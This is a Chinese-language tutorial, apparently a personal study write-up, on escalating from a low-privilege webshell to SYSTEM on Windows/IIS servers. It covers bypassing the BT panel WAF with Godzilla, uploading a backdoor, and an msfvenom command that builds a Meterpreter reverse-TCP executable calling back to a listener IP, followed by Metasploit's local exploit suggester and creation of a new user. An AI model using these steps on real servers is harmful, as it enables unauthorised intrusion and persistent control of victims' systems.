windows权限提升 win+iss 宝塔bypass Msf进行提取
前言
原本我还是傻傻的以为 拿到webshell就可以穿他的服务器了 还是发现太天真了 一些网站你拿到的webshell都是最低权限 什么事情也做不了
影响提权的因素:
无需提权
1、网站的搭建方式会很大的影响到我们的提取 如果是利用集成化的工具搭建的网站我们拿到webshell就是最高的权限(宝塔除外 宝塔有waf防护你进行提权)
2、还有就是语言 如果你使用的是java的话 拿到webshell就拿到了他的服务器
需要提权
1、就是我们说的宝塔waf
2、语言类就是php和asp asp.net都是需要提取的
因为这类语言在用户的分类中有个专门的组叫做 ISS服务器专属组 这个组是处于用户权限的最底层
3、自行搭建(自己配置中间件 数据库 语言)
4、虚拟docker(docker拿到的权限是虚拟权限 需要拿到宿主机权限)
还是这个图 上一节学的是 如何使用 后台数据库 拿到webshell 现在我们的位置是 web权限拿到计算机最高权限
案例一 宝塔Bypass
使用哥斯拉自带的功能 bypass实现
使用宝塔的特征:
就是我们执行命令或者是进行目录翻越时会报错
使用哥斯拉自带的bypass
案例二 自行搭建 win 2008+asp
自行搭建sever的时候会有密钥Windows Server 2012安装密钥 - 小油2018 - 博客园
他的文章的密钥都是可以使用的 还有个注意点就是安装gui模式的win 不然不是图形化的界面
然后搭建上iss Windows IIS服务器安装(超详细)_iis安装-CSDN博客
之后哥斯拉上传一个后门
连接发现 用户不是SYSYEM而是iis appool
这就需要我们进行提权 :
提取的步骤还是第一步先判断 是不是宝塔类的 怎么判断? 有个最简单的方法就是使用哥斯拉进行判断
第二种就是盲打
这边我们通过特征就知道他是 iss+win自行搭建了 因为这个iis策略组是win特有的
提权先使用哥斯拉给的工具如果提权不了就使用 msf
但是发现这两个工具就是一坨 msf启动
有什么不会的命令就使用补全
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.21.14 LPORT=5566 -f exe -o msf.exe
小白解释 : msfvenom 是专门用来生成反弹shell的
-p payload 类型 这边就是生成的反弹shell是用于win还是 linux
Lhost : listen 监听ip 和 端口
-f 是输出类型 是个exe
-o 表示输出的名称
在此之前我们先使用msf进行监听接受shell
启用监听模块
配置监听的ip和端口
配置要监听的paylaod
启用监听
让受害机运行上线
监听到
之后进行本地kali提权
看一下当前的权限是 iss
进行提权:先使用全自动exp进行搜哈系统漏洞
use post/multi/recon/local_exploit_suggester
直接搜哈
找成功的
直接执行
执行shell命令把权限搞到本地
新建个用户玩一玩